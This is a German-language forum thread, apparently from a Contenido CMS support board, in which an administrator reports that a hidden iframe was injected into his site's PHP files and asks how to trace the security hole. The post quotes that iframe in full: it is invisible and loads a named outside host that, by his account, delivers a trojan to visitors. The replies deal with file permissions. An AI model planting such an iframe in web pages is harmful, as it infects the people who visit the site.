Sicherheitslücke?

Gesperrt
phpchris
Beiträge: 438
Registriert: Fr 28. Mai 2004, 16:07
Kontaktdaten:

Sicherheitslücke?

Beitrag von phpchris »

Hallo Leute,

ich brauche mal einen Tip.
Wir setzen momentan eine Contenido Version 4.6.8 ein.
Irgendwie wurde in der front_content.php und in der index.php (von mir selbst erstellte Weiterleitung) eine zeile angefügt:

Code: Alles auswählen

<iframe SRC="http://dianajava.com/stat" WIDTH=1500 HEIGHT=1500 style="display:none"></iframe>
Diese Seite schubst den Usern einen Trojaner unter.

Ich vermute, dass diese Zeilen dort per Sicherheitslücke eingefügt wurden, weil ich FTP-Zugriff ausschließen kann.
Hat jemand eine Idee, wie ich dieser Lücke auf die Spur komme, oder zurückverfolgen kann, wie diese Zeile dort reingeschrieben wurde?

Die Contenido-Logs sagen nichts besonderes aus...
kummer
Beiträge: 2423
Registriert: Do 6. Mai 2004, 09:17
Wohnort: Bern, Schweiz
Kontaktdaten:

Beitrag von kummer »

diese zeile findet sich jetzt in den dateien wieder? oder wurden sie in die datenbank geschrieben?
aitsu.org :: schnell - flexibel - komfortabel :: Version 2.2.0 (since June 22, 2011) (jetzt mit dual license GPL/kommerziell)
phpchris
Beiträge: 438
Registriert: Fr 28. Mai 2004, 16:07
Kontaktdaten:

Beitrag von phpchris »

kummer hat geschrieben:diese zeile findet sich jetzt in den dateien wieder? oder wurden sie in die datenbank geschrieben?
Ja, in den Dateien findet sich diese Zeile wieder.
Hab sie rausgelöscht und warte grad ab, ob Sie wieder erscheint.
kummer
Beiträge: 2423
Registriert: Do 6. Mai 2004, 09:17
Wohnort: Bern, Schweiz
Kontaktdaten:

Beitrag von kummer »

welche recht weisen denn diese dateien auf?
aitsu.org :: schnell - flexibel - komfortabel :: Version 2.2.0 (since June 22, 2011) (jetzt mit dual license GPL/kommerziell)
phpchris
Beiträge: 438
Registriert: Fr 28. Mai 2004, 16:07
Kontaktdaten:

Beitrag von phpchris »

Schreibrechte nur Benutzer, rest hatte das Recht zum Lesen.
Habe das Schreibrecht auch entfernt und es scheint nicht wieder aufgetaucht zu sein!
Ich warte noch ab...
Gesperrt